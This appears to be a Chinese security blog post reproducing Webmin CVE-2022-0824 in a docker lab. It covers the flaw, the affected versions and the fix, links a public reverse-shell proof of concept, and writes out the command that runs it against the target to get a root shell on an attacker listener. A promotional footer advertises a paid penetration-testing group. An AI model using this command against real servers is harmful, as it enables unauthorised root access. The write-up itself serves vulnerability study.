Webmin 漏洞 CVE-2022-0824复现
2022-12-5 21:20:11 Author: 渗透安全团队(查看原文) 阅读量:51 收藏

WEBmin简介

Webmin 是一个基于 Web 的 Linux/Unix 系统管理软件。

简单地说,就是你可以打开一个浏览器,然后输入 Webmin 的管理地址,在打开的页面中就可以管理你的 Linux/Unix 系统了。

Webmin 功能强大,可以管理设置很多东西,比如用户帐户、Apache 服务、DNS 、文件共享等等,几乎所有的东西都能给你管上一管。

Webmin 是由一个简单的 Web 服务器和一些 CGI 程序组成的系统,Web 服务器和所有 CGI 程序都是使用 Perl 5,并且不使用非标准的 Perl 模块。

它通过管理相应的系统配置文件来实现管理目的,比如它直接通过访问编辑 /etc/passwd 来管理用户密码等等。

因此,我们可以借助 Webmin 来辅助我们学习配置 Linux 系统。

Webmin 官网首页

https://www.webmin.com/

目前最新的版本为2022年11月27日更新的Webmin 2.010

漏洞介绍

漏洞描述

在 Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行。

其他漏洞信息可以参考CVE,NVD,CNVD,CNNVD等漏洞库的披露。

漏洞编号

CVE编号:CVE-2022-0824

CNVD编号:CNVD-2022-17023

CNNVD编号::CNNVD-202203-076

危险等级:

该漏洞 CVSS:3.1评分为8.8 ,属于高危漏洞

影响版本:

Webmin Webmin < Webmin Webmin1.990    //1.990版本之前均受影响

环境搭建

webmin可以下载对应版本自行搭建,也可以直接拉取docker镜像,本次以docker镜像进行复现。

POC/EXP:已公开

POC地址

https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell

拉取漏洞镜像和访问

docker pull vulfocus/webmin_cve-2022-0824:latestdocker run -itd -p 10000:10000 -d vulfocus/webmin_cve-2022-0824

访问映射地址
127.0.0.1:10000,
root 密码: password登录

如上,漏洞环境搭建完毕。

漏洞复现

目标站点:http://127.0.0.1:10000 ,IP为192.168.171.132

攻击端:linux-kali ,IP为192.168.171.144

在攻击端监听端口4444:

将POC文件下载,并且执行利用脚本

python3 Webmin-revshell.py -t http://192.168.171.132:10000 -c root:password -LS 192.168.171.144:9090 -L 192.168.171.144 -P 4444

成功执行命令可以看到在监听端获取了root权限。

解决方案:

更新到最新版本 


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247494798&idx=2&sn=71a3a7b6092e26e0efb8d92b6eccd6f3&chksm=c1761121f6019837e39c2f673d5b01aa1e40e3350eb094c51b14582e7b1745509ed38aeeb405#rd
如有侵权请联系:admin#unsafe.sh